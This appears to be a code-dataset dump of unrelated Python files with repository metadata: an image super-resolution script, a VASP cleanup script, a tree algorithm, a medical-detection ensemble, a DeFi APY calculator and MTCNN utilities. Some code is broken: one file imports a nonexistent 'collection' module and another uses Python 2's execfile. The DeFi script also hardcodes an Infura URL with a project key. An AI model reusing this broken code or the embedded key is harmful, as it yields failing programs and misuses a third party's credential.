inference_realesrgan.py
|
blabra/Real-ESRGAN
|
bd5c69d2ef30f27cc2a510443451a2dc841aec28
|
[
"BSD-3-Clause"
] | null | null | null |
import argparse
import cv2
import glob
import os
from basicsr.archs.rrdbnet_arch import RRDBNet
import time
from realesrgan import RealESRGANer
from realesrgan.archs.srvgg_arch import SRVGGNetCompact
def main():
"""Inference demo for Real-ESRGAN.
"""
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input', type=str, default='inputs', help='Input image or folder')
parser.add_argument(
'-n',
'--model_name',
type=str,
default='RealESRGAN_x4plus',
help=('Model names: RealESRGAN_x4plus | RealESRNet_x4plus | RealESRGAN_x4plus_anime_6B | RealESRGAN_x2plus'
'RealESRGANv2-anime-xsx2 | RealESRGANv2-animevideo-xsx2-nousm | RealESRGANv2-animevideo-xsx2'
'RealESRGANv2-anime-xsx4 | RealESRGANv2-animevideo-xsx4-nousm | RealESRGANv2-animevideo-xsx4'))
parser.add_argument('-o', '--output', type=str, default='results', help='Output folder')
parser.add_argument('-s', '--outscale', type=float, default=4, help='The final upsampling scale of the image')
parser.add_argument('--suffix', type=str, default='Realesrgan-4x', help='Suffix of the restored image')
parser.add_argument('-t', '--tile', type=int, default=0, help='Tile size, 0 for no tile during testing')
parser.add_argument('--tile_pad', type=int, default=10, help='Tile padding')
parser.add_argument('--pre_pad', type=int, default=0, help='Pre padding size at each border')
parser.add_argument('--face_enhance', action='store_true', help='Use GFPGAN to enhance face')
parser.add_argument('--half', action='store_true', help='Use half precision during inference')
parser.add_argument(
'--alpha_upsampler',
type=str,
default='realesrgan',
help='The upsampler for the alpha channels. Options: realesrgan | bicubic')
parser.add_argument(
'--ext',
type=str,
default='auto',
help='Image extension. Options: auto | jpg | png, auto means using the same extension as inputs')
args = parser.parse_args()
# determine models according to model names
args.model_name = args.model_name.split('.')[0]
if args.model_name in ['RealESRGAN_x4plus', 'RealESRNet_x4plus']: # x4 RRDBNet model
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=4)
netscale = 4
elif args.model_name in ['RealESRGAN_x4plus_anime_6B']: # x4 RRDBNet model with 6 blocks
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4)
netscale = 4
elif args.model_name in ['RealESRGAN_x2plus']: # x2 RRDBNet model
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=2)
netscale = 2
elif args.model_name in [
'RealESRGANv2-anime-xsx2', 'RealESRGANv2-animevideo-xsx2-nousm', 'RealESRGANv2-animevideo-xsx2'
]: # x2 VGG-style model (XS size)
model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=2, act_type='prelu')
netscale = 2
elif args.model_name in [
'RealESRGANv2-anime-xsx4', 'RealESRGANv2-animevideo-xsx4-nousm', 'RealESRGANv2-animevideo-xsx4'
]: # x4 VGG-style model (XS size)
model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=4, act_type='prelu')
netscale = 4
else:
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4)
netscale = 4
# determine model paths
model_path = os.path.join('experiments/pretrained_models', args.model_name + '.pth')
if not os.path.isfile(model_path):
model_path = os.path.join('realesrgan/weights', args.model_name + '.pth')
if not os.path.isfile(model_path):
raise ValueError(f'Model {args.model_name} does not exist.')
# restorer
upsampler = RealESRGANer(
scale=netscale,
model_path=model_path,
model=model,
tile=args.tile,
tile_pad=args.tile_pad,
pre_pad=args.pre_pad,
half=args.half)
if args.face_enhance: # Use GFPGAN for face enhancement
from gfpgan import GFPGANer
face_enhancer = GFPGANer(
model_path='https://github.com/TencentARC/GFPGAN/releases/download/v0.2.0/GFPGANCleanv1-NoCE-C2.pth',
upscale=args.outscale,
arch='clean',
channel_multiplier=2,
bg_upsampler=upsampler)
os.makedirs(args.output, exist_ok=True)
if os.path.isfile(args.input):
paths = [args.input]
else:
paths = sorted(glob.glob(os.path.join(args.input, '*')))
for idx, path in enumerate(paths):
startTime = time.perf_counter()
imgname, extension = os.path.splitext(os.path.basename(path))
img = cv2.imread(path, cv2.IMREAD_UNCHANGED)
if len(img.shape) == 3 and img.shape[2] == 4:
img_mode = 'RGBA'
else:
img_mode = None
if args.ext == 'auto':
extension = "png"
else:
extension = args.ext
if img_mode == 'RGBA': # RGBA images should be saved in png format
extension = 'png'
save_path = os.path.join(args.output, f'{imgname}-{args.suffix}.{extension}')
if os.path.exists(save_path):
continue
try:
if args.face_enhance:
_, _, output = face_enhancer.enhance(img, has_aligned=False, only_center_face=False, paste_back=True)
else:
output, _ = upsampler.enhance(img, outscale=args.outscale)
except RuntimeError as error:
print('Error', error)
print('If you encounter CUDA out of memory, try to set --tile with a smaller number.')
else:
cv2.imwrite(save_path, output)
print(f'NO.{idx}, {imgname} is done, used {round((time.perf_counter() - startTime), 4)} seconds')
if __name__ == '__main__':
main()
| 43.73913
| 117
| 0.647614
| 803
| 6,036
| 4.701121
| 0.280199
| 0.028609
| 0.05404
| 0.012715
| 0.301192
| 0.269404
| 0.259603
| 0.259603
| 0.259603
| 0.244768
| 0
| 0.025161
| 0.229622
| 6,036
| 137
| 118
| 44.058394
| 0.786667
| 0.050862
| 0
| 0.239316
| 0
| 0.017094
| 0.272139
| 0.084529
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008547
| false
| 0
| 0.076923
| 0
| 0.08547
| 0.025641
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1340144aae426a1da982a7084f1832cdca8e0a63
| 515
|
py
|
Python
|
examples/Fe__vasp/Fe_fcc_afm_D/Fe_fcc_afm_D_vac_A/clean_vasp.py
|
eragasa/pypospack
|
21cdecaf3b05c87acc532d992be2c04d85bfbc22
|
[
"MIT"
] | 4
|
2018-01-18T19:59:56.000Z
|
2020-08-25T11:56:52.000Z
|
examples/Fe__vasp/Fe_fcc_afm_D/Fe_fcc_afm_D_vac_A/clean_vasp.py
|
eragasa/pypospack
|
21cdecaf3b05c87acc532d992be2c04d85bfbc22
|
[
"MIT"
] | 1
|
2018-04-22T23:02:13.000Z
|
2018-04-22T23:02:13.000Z
|
examples/Fe__vasp/Fe_fcc_afm_D/Fe_fcc_afm_D_vac_A/clean_vasp.py
|
eragasa/pypospack
|
21cdecaf3b05c87acc532d992be2c04d85bfbc22
|
[
"MIT"
] | 1
|
2019-09-14T07:04:42.000Z
|
2019-09-14T07:04:42.000Z
|
import os
filenames_delete = [
'CHG',
'CHGCAR',
'CONTCAR',
'DOSCAR',
'EIGENVAL',
'IBZKPT',
'job.err',
'job.out',
'OSZICAR',
'PCDAT',
'REPORT',
'vasp.log',
'vasprun.xml',
'WAVECAR',
'XDATCAR'
]
for filename in filenames_delete:
try:
os.remove(filename)
msg = "{} removed.".format(filename)
except FileNotFoundError as e:
msg = "{} does not exist.".format(filename)
except:
raise
print(msg)
| 17.166667
| 51
| 0.518447
| 50
| 515
| 5.3
| 0.78
| 0.113208
| 0.150943
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.330097
| 515
| 29
| 52
| 17.758621
| 0.768116
| 0
| 0
| 0
| 0
| 0
| 0.252427
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037037
| 0
| 0.037037
| 0.037037
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1340c125093f2e5f053bbf9519f4a5c3e3aa6a2e
| 1,195
|
py
|
Python
|
binary_trees/largest_values_in_tree_rows.py
|
ethyl2/code_challenges
|
3c9ccca1782f92728e60a515a7ca797f6d470e81
|
[
"MIT"
] | null | null | null |
binary_trees/largest_values_in_tree_rows.py
|
ethyl2/code_challenges
|
3c9ccca1782f92728e60a515a7ca797f6d470e81
|
[
"MIT"
] | null | null | null |
binary_trees/largest_values_in_tree_rows.py
|
ethyl2/code_challenges
|
3c9ccca1782f92728e60a515a7ca797f6d470e81
|
[
"MIT"
] | null | null | null |
'''
Sean Chen's solution.
See mine in largest_values_in_each_row.py
'''
from collection import deque
def largest_values_in_tree_rows(t):
rv = []
if t is None:
return rv
current_depth = 0
current_max = t.value
q = deque()
# add the root node to the queue at a depth of 0
q.append((t, current_depth))
while len(q) > 0:
node, depth = q.popleft()
# if the depth of the current node is different from
# `current_node`, add `current_max` to `rv` and then
# reset `current_max` and `current_depth`
if depth != current_depth:
rv.append(current_max)
current_max = node.value
current_depth = depth
# otherwise, we update `current_max` if we need to
else:
current_max = max(node.value, current_max)
# add the left and right children of the current node
# to the queue, along with their depths
if node.left:
q.append((node.left, depth + 1))
if node.right:
q.append((node.right, depth + 1))
# don't forget to append the last `current_max`
rv.append(current_max)
return rv
| 24.895833
| 61
| 0.594979
| 172
| 1,195
| 3.994186
| 0.372093
| 0.14556
| 0.043668
| 0.040757
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006158
| 0.320502
| 1,195
| 47
| 62
| 25.425532
| 0.839901
| 0.366527
| 0
| 0.173913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0.043478
| 0
| 0.173913
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13422bb3478f929cfdd7d39790b4b35df0ba961e
| 7,034
|
py
|
Python
|
src/infer/_ExtractSimpleDeformTTA.py
|
RamsteinWR/PneumoniaRSNA1
|
08bdba51292307a78ef711c6be4a63faea240ddf
|
[
"MIT"
] | null | null | null |
src/infer/_ExtractSimpleDeformTTA.py
|
RamsteinWR/PneumoniaRSNA1
|
08bdba51292307a78ef711c6be4a63faea240ddf
|
[
"MIT"
] | null | null | null |
src/infer/_ExtractSimpleDeformTTA.py
|
RamsteinWR/PneumoniaRSNA1
|
08bdba51292307a78ef711c6be4a63faea240ddf
|
[
"MIT"
] | null | null | null |
import json
import os
import re
import numpy as np
import pandas as pd
from src.infer.ExtractDeformableTTA import MAPPINGS_PATH, test_image_set, METADATA_PATH, RCNN0_DETS_DIR
WDIR = os.path.dirname(os.path.abspath(__file__))
def get_results(det_folder, test_set, suffix):
filepath = os.path.join(det_folder, test_set, "results/detections_{}_results_{}.json".format(test_set, suffix))
with open(filepath) as f:
return json.load(f)
def flip_box(box):
"""
box (list, length 4): [x1, y1, w, h]
"""
# Get top right corner of prediction
x1 = box[0]
y1 = box[1]
w = box[2]
h = box[3]
topRight = (x1 + w, y1)
# Top left corner of flipped box is:
newTopLeft = (1024. - topRight[0], topRight[1])
return [newTopLeft[0], newTopLeft[1], w, h]
def convert_dict_to_df(results, mapping, metadata, test_set, flip=False, threshold=0.):
list_of_image_ids = []
list_of_scores = []
list_of_bboxes = []
for res in results:
coco_image_id = res["image_id"]
coco_img_file = "COCO_{}_{}.png".format(test_set, str(coco_image_id).zfill(12))
list_of_image_ids.append(mapping[coco_img_file])
list_of_scores.append(res["score"])
list_of_bboxes.append(res["bbox"])
if flip:
list_of_bboxes = [flip_box(_) for _ in list_of_bboxes]
results_df = pd.DataFrame({"patientId": [pid.split(".")[0] for pid in list_of_image_ids],
"score": list_of_scores,
"x": [box[0] for box in list_of_bboxes],
"y": [box[1] for box in list_of_bboxes],
"w": [box[2] for box in list_of_bboxes],
"h": [box[3] for box in list_of_bboxes],
"bbox": list_of_bboxes})
results_df = results_df.sort_values(["patientId", "score"], ascending=False)
results_df = results_df[results_df.score >= threshold]
results_df = results_df.merge(metadata, on="patientId", how="left")
return results_df[["patientId", "score", "x", "y", "w", "h", "bbox", "view"]]
with open(MAPPINGS_PATH) as f:
mapping = json.load(f)
with open(MAPPINGS_PATH.replace(test_image_set, "{}_flip".format(test_image_set))) as f:
flip_mapping = json.load(f)
metadata = pd.read_csv(METADATA_PATH)
def get_TTA_results(fold_imsize, test_image_set, MAIN_DIR):
TTAs = []
for test_set in [test_image_set, "{}_flip".format(test_image_set)]:
for suffix in ["original", "scale080", "scale120"]:
tmp_results = get_results(os.path.join(MAIN_DIR, "peepin_{}".format(fold_imsize, fold_imsize)),
test_set=test_set, suffix=suffix)
if re.search("_flip", test_set):
tmp_df = convert_dict_to_df(tmp_results,
flip_mapping,
metadata,
test_set=test_set,
flip=True,
threshold=0.01)
else:
tmp_df = convert_dict_to_df(tmp_results,
mapping,
metadata,
test_set=test_set,
flip=False,
threshold=0.01)
TTAs.append(tmp_df)
return TTAs
execfile(os.path.join(WDIR, "DetectionEnsemble.py"))
def run_ensemble(list_of_dfs, metadata, adjust_score=True):
list_of_pids = []
list_of_ensemble_bboxes = []
for pid in np.unique(metadata.patientId):
list_of_tmp_dfs = []
list_of_detections = []
view = metadata[metadata.patientId == pid]["view"].iloc[0]
for df_index, each_df in enumerate(list_of_dfs):
tmp_df = each_df[each_df.patientId == pid]
list_of_bboxes = []
for rownum, row in tmp_df.iterrows():
bbox = row.bbox
bbox.append(1)
bbox.append(row.score)
list_of_bboxes.append(bbox)
list_of_detections.append(list_of_bboxes)
from src.infer.DetectionEnsemble import GeneralEnsemble
list_of_ensemble_bboxes.append(GeneralEnsemble(list_of_detections, iou_thresh=0.4))
list_of_pids.append(pid)
# Create new DataFrame
list_of_new_pids = []
list_of_bboxes = []
for i, ensemble_bboxes in enumerate(list_of_ensemble_bboxes):
for bbox in ensemble_bboxes:
list_of_new_pids.append(list_of_pids[i])
list_of_bboxes.append(bbox)
ensemble_bbox_df = pd.DataFrame({"patientId": list_of_new_pids,
"x": [box[0] for box in list_of_bboxes],
"y": [box[1] for box in list_of_bboxes],
"w": [box[2] for box in list_of_bboxes],
"h": [box[3] for box in list_of_bboxes],
"score": [box[5] for box in list_of_bboxes],
"votes": [box[-1] for box in list_of_bboxes],
"bbox": list_of_bboxes})
if adjust_score:
ensemble_bbox_df["score"] = ensemble_bbox_df.score * ensemble_bbox_df.votes
return ensemble_bbox_df
imsizes = [224, 256, 288, 320, 352, 384, 416, 448, 480, 512]
fold0_nom = "fold{}_{}".format(0, imsizes[0])
fold1_nom = "fold{}_{}".format(1, imsizes[1])
fold2_nom = "fold{}_{}".format(2, imsizes[2])
fold3_nom = "fold{}_{}".format(3, imsizes[3])
fold4_nom = "fold{}_{}".format(4, imsizes[4])
fold5_nom = "fold{}_{}".format(5, imsizes[5])
fold6_nom = "fold{}_{}".format(6, imsizes[6])
fold7_nom = "fold{}_{}".format(7, imsizes[7])
fold8_nom = "fold{}_{}".format(8, imsizes[8])
fold9_nom = "fold{}_{}".format(9, imsizes[9])
fold1RCNN0 = run_ensemble(get_TTA_results("fold1_256", test_image_set, RCNN0_DETS_DIR.format(fold1_nom)), metadata)
fold3RCNN0 = run_ensemble(get_TTA_results("fold3_320", test_image_set, RCNN0_DETS_DIR.format(fold3_nom)), metadata)
fold5RCNN0 = run_ensemble(get_TTA_results("fold5_384", test_image_set, RCNN0_DETS_DIR.format(fold5_nom)), metadata)
fold7RCNN0 = run_ensemble(get_TTA_results("fold7_448", test_image_set, RCNN0_DETS_DIR.format(fold7_nom)), metadata)
fold9RCNN0 = run_ensemble(get_TTA_results("fold9_512", test_image_set, RCNN0_DETS_DIR.format(fold9_nom)), metadata)
list_of_dfs = [fold1RCNN0, fold3RCNN0, fold5RCNN0, fold7RCNN0, fold9RCNN0]
final_TTA_ensemble = run_ensemble(list_of_dfs, metadata, adjust_score=False)
final_TTA_ensemble["adjustedScore"] = final_TTA_ensemble.score * final_TTA_ensemble.votes
final_TTA_ensemble = final_TTA_ensemble[["patientId", "x", "y", "w", "h", "score", "votes", "adjustedScore"]]
final_TTA_ensemble.to_csv(os.path.join(WDIR, "../../SimpleDCNPredictions.csv"), index=False)
| 44.238994
| 115
| 0.598806
| 918
| 7,034
| 4.262527
| 0.19281
| 0.067467
| 0.064401
| 0.039356
| 0.277536
| 0.203424
| 0.187835
| 0.132635
| 0.064401
| 0.064401
| 0
| 0.031558
| 0.279215
| 7,034
| 158
| 116
| 44.518987
| 0.740237
| 0.018197
| 0
| 0.181102
| 0
| 0
| 0.067654
| 0.009727
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03937
| false
| 0
| 0.055118
| 0
| 0.133858
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1342626b945cae1f2c60f3de7811ba70848e89f4
| 1,896
|
py
|
Python
|
pool4.py
|
yfii/yfiiapi
|
2c0341b66108f99005dc5a40e3d1d30267f50bb5
|
[
"MIT"
] | 4
|
2020-09-11T12:31:37.000Z
|
2020-12-14T04:42:05.000Z
|
pool4.py
|
yfii/yfiiapi
|
2c0341b66108f99005dc5a40e3d1d30267f50bb5
|
[
"MIT"
] | 1
|
2020-10-07T11:03:07.000Z
|
2020-10-07T11:03:07.000Z
|
pool4.py
|
yfii/yfiiapi
|
2c0341b66108f99005dc5a40e3d1d30267f50bb5
|
[
"MIT"
] | 9
|
2020-09-25T17:54:50.000Z
|
2021-06-05T05:36:14.000Z
|
from web3 import Web3, HTTPProvider
import json
w3url = "https://mainnet.infura.io/v3/998f64f3627548bbaf2630599c1eefca"
w3 = Web3(HTTPProvider(w3url))
WETH = "0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2"
YFII = "0xa1d0E215a23d7030842FC67cE582a6aFa3CCaB83"
DAI = "0x6B175474E89094C44Da98b954EedeAC495271d0F"
iUSDT = "0x72Cf258c852Dc485a853370171d46B9D29fD3184"
POOL4 = "0x3d367C9529f260B0661e1C1E91167C9319ee96cA"
yfii2dai = [YFII, WETH, DAI]
with open("abi/erc20.json") as f:
erc20ABI = json.loads(f.read())
with open("abi/uniswapRouterv2.json") as f:
uniswapABI = json.loads(f.read())
with open("abi/pool4.json") as f:
pool4ABI = json.loads(f.read())
uniswap_instance = w3.eth.contract(
abi=uniswapABI,
address=w3.toChecksumAddress("0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D"),
)
pool4_instance = w3.eth.contract(abi=pool4ABI, address=POOL4)
def getyfiiprice():
price = uniswap_instance.functions.getAmountsOut(
w3.toWei(1, "ether"), yfii2dai
).call()[-1]
return float(w3.fromWei(price, "ether"))
def _weekly_reward():
return pool4_instance.functions.rewardRate().call() / 1e18 * 60480
def _totalStakedAmount():
token_instance = w3.eth.contract(abi=erc20ABI, address=w3.toChecksumAddress(YFII))
return token_instance.functions.balanceOf(POOL4).call() / 1e18
def getDATA():
weekly_reward = (
pool4_instance.functions.rewardRate().call() / 1e6 * 7 * 24 * 60 * 60
)
token_instance = w3.eth.contract(abi=erc20ABI, address=w3.toChecksumAddress(YFII))
totalStakedAmount = token_instance.functions.balanceOf(POOL4).call() / 1e18
YFIIPrice = getyfiiprice()
TVL = totalStakedAmount * YFIIPrice
YFIWeeklyROI = (weekly_reward / TVL) * 100 / 1.01
apy = YFIWeeklyROI * 52
return {"apy": apy, "totalStakedAmount": totalStakedAmount, "TVL": TVL}
if __name__ == "__main__":
print(getDATA())
| 29.169231
| 86
| 0.730485
| 200
| 1,896
| 6.815
| 0.395
| 0.062362
| 0.038151
| 0.061629
| 0.287601
| 0.19956
| 0.19956
| 0.098313
| 0.098313
| 0.098313
| 0
| 0.153514
| 0.144515
| 1,896
| 64
| 87
| 29.625
| 0.686806
| 0
| 0
| 0.045455
| 0
| 0
| 0.214135
| 0.14557
| 0
| 0
| 0.132911
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.045455
| 0.022727
| 0.227273
| 0.022727
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1345874b0ae4768978973e82f88c986754ca58f9
| 7,109
|
py
|
Python
|
tools/accuracy_checker/openvino/tools/accuracy_checker/evaluators/custom_evaluators/mtcnn_evaluator_utils.py
|
Pandinosaurus/open_model_zoo
|
2543996541346418919c5cddfb71e33e2cdef080
|
[
"Apache-2.0"
] | 1
|
2019-05-31T14:01:42.000Z
|
2019-05-31T14:01:42.000Z
|
tools/accuracy_checker/openvino/tools/accuracy_checker/evaluators/custom_evaluators/mtcnn_evaluator_utils.py
|
Pandinosaurus/open_model_zoo
|
2543996541346418919c5cddfb71e33e2cdef080
|
[
"Apache-2.0"
] | null | null | null |
tools/accuracy_checker/openvino/tools/accuracy_checker/evaluators/custom_evaluators/mtcnn_evaluator_utils.py
|
Pandinosaurus/open_model_zoo
|
2543996541346418919c5cddfb71e33e2cdef080
|
[
"Apache-2.0"
] | null | null | null |
"""
Copyright (c) 2018-2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from collections import OrderedDict
import cv2
import numpy as np
from ...adapters import MTCNNPAdapter
def calibrate_predictions(previous_stage_predictions, out, threshold, outputs_mapping, iou_type=None):
prob_out = outputs_mapping['probability_out']
if prob_out not in out[0]:
prob_out = prob_out + '/sink_port_0' if '/sink_port_0' not in prob_out else prob_out.replace('/sink_port_0', '')
score = out[0][prob_out][:, 1]
pass_t = np.where(score > 0.7)[0]
removed_boxes = [i for i in range(previous_stage_predictions[0].size) if i not in pass_t]
previous_stage_predictions[0].remove(removed_boxes)
previous_stage_predictions[0].scores = score[pass_t]
bboxes = np.c_[
previous_stage_predictions[0].x_mins, previous_stage_predictions[0].y_mins,
previous_stage_predictions[0].x_maxs, previous_stage_predictions[0].y_maxs,
previous_stage_predictions[0].scores
]
region_out = outputs_mapping['region_out']
if region_out not in out[0]:
region_out = (
region_out + '/sink_port_0' if '/sink_port_0' not in region_out else region_out.replace('/sink_port_0', '')
)
mv = out[0][region_out][pass_t]
if iou_type:
previous_stage_predictions[0], peek = nms(previous_stage_predictions[0], threshold, iou_type)
bboxes = np.c_[
previous_stage_predictions[0].x_mins, previous_stage_predictions[0].y_mins,
previous_stage_predictions[0].x_maxs, previous_stage_predictions[0].y_maxs,
previous_stage_predictions[0].scores
]
mv = mv[np.sort(peek).astype(int)]
x_mins, y_mins, x_maxs, y_maxs, _ = bbreg(bboxes, mv.T).T
previous_stage_predictions[0].x_mins = x_mins
previous_stage_predictions[0].y_mins = y_mins
previous_stage_predictions[0].x_maxs = x_maxs
previous_stage_predictions[0].y_maxs = y_maxs
return previous_stage_predictions
def nms(prediction, threshold, iou_type):
bboxes = np.c_[prediction.x_mins, prediction.y_mins, prediction.x_maxs, prediction.y_maxs, prediction.scores]
peek = MTCNNPAdapter.nms(bboxes, threshold, iou_type)
prediction.remove([i for i in range(prediction.size) if i not in peek])
return prediction, peek
def bbreg(boundingbox, reg):
reg = reg.T
# calibrate bounding boxes
w = boundingbox[:, 2] - boundingbox[:, 0] + 1
h = boundingbox[:, 3] - boundingbox[:, 1] + 1
bb0 = boundingbox[:, 0] + reg[:, 0] * w
bb1 = boundingbox[:, 1] + reg[:, 1] * h
bb2 = boundingbox[:, 2] + reg[:, 2] * w
bb3 = boundingbox[:, 3] + reg[:, 3] * h
boundingbox[:, 0:4] = np.array([bb0, bb1, bb2, bb3]).T
return boundingbox
def filter_valid(dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph):
mask = np.ones(len(tmph))
tmp_ys_len = (edy + 1) - dy
tmp_xs_len = (edx + 1) - dx
img_ys_len = (ey + 1) - y
img_xs_len = (ex + 1) - x
mask = np.logical_and(mask, np.logical_and(tmph > 0, tmpw > 0))
mask = np.logical_and(mask, np.logical_and(tmp_ys_len > 0, tmp_xs_len > 0))
mask = np.logical_and(mask, np.logical_and(img_xs_len > 0, img_ys_len > 0))
mask = np.logical_and(mask, np.logical_and(tmp_xs_len == img_xs_len, tmp_ys_len == img_ys_len))
return dy[mask], edy[mask], dx[mask], edx[mask], y[mask], ey[mask], x[mask], ex[mask], tmpw[mask], tmph[mask], mask
def pad(boxesA, h, w):
boxes = boxesA.copy()
tmph = boxes[:, 3] - boxes[:, 1] + 1
tmpw = boxes[:, 2] - boxes[:, 0] + 1
numbox = boxes.shape[0]
dx = np.ones(numbox)
dy = np.ones(numbox)
edx = tmpw
edy = tmph
x = boxes[:, 0:1][:, 0]
y = boxes[:, 1:2][:, 0]
ex = boxes[:, 2:3][:, 0]
ey = boxes[:, 3:4][:, 0]
tmp = np.where(ex > w)[0]
if tmp.shape[0] != 0:
edx[tmp] = -ex[tmp] + w - 1 + tmpw[tmp]
ex[tmp] = w - 1
tmp = np.where(ey > h)[0]
if tmp.shape[0] != 0:
edy[tmp] = -ey[tmp] + h - 1 + tmph[tmp]
ey[tmp] = h - 1
tmp = np.where(x < 1)[0]
if tmp.shape[0] != 0:
dx[tmp] = 2 - x[tmp]
x[tmp] = np.ones_like(x[tmp])
tmp = np.where(y < 1)[0]
if tmp.shape[0] != 0:
dy[tmp] = 2 - y[tmp]
y[tmp] = np.ones_like(y[tmp])
# for python index from 0, while matlab from 1
dy, dx = np.maximum(0, dy - 1), np.maximum(0, dx - 1)
y = np.maximum(0, y - 1)
x = np.maximum(0, x - 1)
edy = np.maximum(0, edy - 1)
edx = np.maximum(0, edx - 1)
ey = np.maximum(0, ey - 1)
ex = np.maximum(0, ex - 1)
return filter_valid(dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph)
def rerec(bboxA):
w = bboxA[:, 2] - bboxA[:, 0]
h = bboxA[:, 3] - bboxA[:, 1]
max_side = np.maximum(w, h).T
bboxA[:, 0] = bboxA[:, 0] + w * 0.5 - max_side * 0.5
bboxA[:, 1] = bboxA[:, 1] + h * 0.5 - max_side * 0.5
bboxA[:, 2:4] = bboxA[:, 0:2] + np.repeat([max_side], 2, axis=0).T
return bboxA
def cut_roi(image, prediction, dst_size, include_bound=True):
bboxes = np.c_[prediction.x_mins, prediction.y_mins, prediction.x_maxs, prediction.y_maxs, prediction.scores]
img = image.data
bboxes = rerec(bboxes)
bboxes[:, 0:4] = np.fix(bboxes[:, 0:4])
dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph, mask = pad(bboxes, *img.shape[:2])
bboxes = bboxes[mask]
numbox = bboxes.shape[0]
tempimg = np.zeros((numbox, dst_size, dst_size, 3))
for k in range(numbox):
tmp_k_h, tmp_k_w = int(tmph[k]) + int(include_bound), int(tmpw[k]) + int(include_bound)
tmp = np.zeros((tmp_k_h, tmp_k_w, 3))
tmp_ys, tmp_xs = slice(int(dy[k]), int(edy[k]) + 1), slice(int(dx[k]), int(edx[k]) + 1)
img_ys, img_xs = slice(int(y[k]), int(ey[k]) + 1), slice(int(x[k]), int(ex[k]) + 1)
tmp[tmp_ys, tmp_xs] = img[img_ys, img_xs]
tempimg[k, :, :, :] = cv2.resize(tmp, (dst_size, dst_size))
image.data = tempimg
return image
def transform_for_callback(batch_size, raw_outputs):
output_per_box = []
fq_weights = []
for i in range(batch_size):
box_outs = OrderedDict()
for layer_name, data in raw_outputs[0].items():
if layer_name in fq_weights:
continue
if layer_name.endswith('fq_weights_1'):
fq_weights.append(layer_name)
box_outs[layer_name] = data
elif data.shape[0] <= i:
box_outs[layer_name] = data
else:
box_outs[layer_name] = np.expand_dims(data[i], axis=0)
output_per_box.append(box_outs)
return output_per_box
| 39.494444
| 120
| 0.623435
| 1,145
| 7,109
| 3.684716
| 0.175546
| 0.064707
| 0.11946
| 0.112586
| 0.310974
| 0.252192
| 0.226594
| 0.212373
| 0.1799
| 0.1799
| 0
| 0.032146
| 0.229849
| 7,109
| 179
| 121
| 39.715084
| 0.738447
| 0.089886
| 0
| 0.111111
| 0
| 0
| 0.01687
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0.027778
| 0.027778
| 0
| 0.138889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
134646519d68e17184a83f90eaeb23182da3950c
| 8,849
|
py
|
Python
|
pytests/Atomicity/basic_ops.py
|
ashwin2002/TAF
|
4223787a1f4c0fe9fa841543020b48ada9ade9e3
|
[
"Apache-2.0"
] | null | null | null |
pytests/Atomicity/basic_ops.py
|
ashwin2002/TAF
|
